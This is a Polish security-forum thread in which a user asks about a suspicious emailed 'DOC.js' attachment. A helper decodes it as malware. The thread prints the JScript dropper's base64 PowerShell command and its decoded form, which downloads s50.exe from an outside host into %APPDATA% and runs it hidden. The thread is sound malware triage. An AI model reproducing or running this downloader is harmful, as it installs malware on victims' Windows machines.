Skocz do zawartości

Dostałem maila z załącznikiem Nazwa Doc.js, szkodnik?


Rekomendowane odpowiedzi

Witam, jak w temacie:

Nazwa DOC.js pszyszedł z dość podejrzanym mailem, pobrałem na tablet z androidem.

Wewnątrz pliku:

 

var TnoRM = new ActiveXObject("shell.application");
TnoRM.ShellExecute("powershell.exe", "powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAHcAbwBqAGMAaQBlAGMAaABvAHcAaQBjAHoALgBuAHMAdAByAGUAZgBhAC4AcABsAC8AegBkAHIALwBzADUAMAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAbgB2AGkAZAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAaQBkAC4AZQB4AGUAHSApAA==", "C:\\Windows\\system32\\WindowsPowerShell\\v1.0", "open", "1");
Może ktoś spojrzeć co to jest?

W załączniku plik ze zmienionym .js na .txt

Edytowane przez picasso
Kasuje zainfekowany załącznik. //Miszel03
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Plik w postaci załącznika został usunięty, gdyż nie wolno na serwer tutaj ładować zainfekowanych plików, niezależnie od tego czy plik stanowiłby zagrożenie dla innych (zmieniona nazwa rozszerzenia). Cytowana zawartość pliku bez wątpienia wskazuje, że to szkodnik, ale szkodnik dla platformy Windows wykorzystujący wbudowany w system PowerShell. Komenda wdrażana przy udziale PowerShell po odkodowaniu:
 

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('hxxp://mwojciechowicz.nstrefa.pl/zdr/s50.exe', $env:APPDATA\nvid.exe );Start-Process ( $env:APPDATA\nvid.exe )

[Czyli jest pobierany z serwera plik s50.exe, który zostaje wstawiony na Windows w ścieżce %AppData%\nvid.exe]

Jeśli załącznik był pobrany tylko na tablet z Androidem, tu kończy się pomoc, gdyż ani nie ma narzędzi diagnostycznych na Androida które stosujemy tutaj, ani cytowana zawartość nie wskazuje by platforma Android była w zakresie działania infekcji. Jeśli jednak załącznik miał styczność z platformą Windows, wymagane są raporty obowiązkowe działu.

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...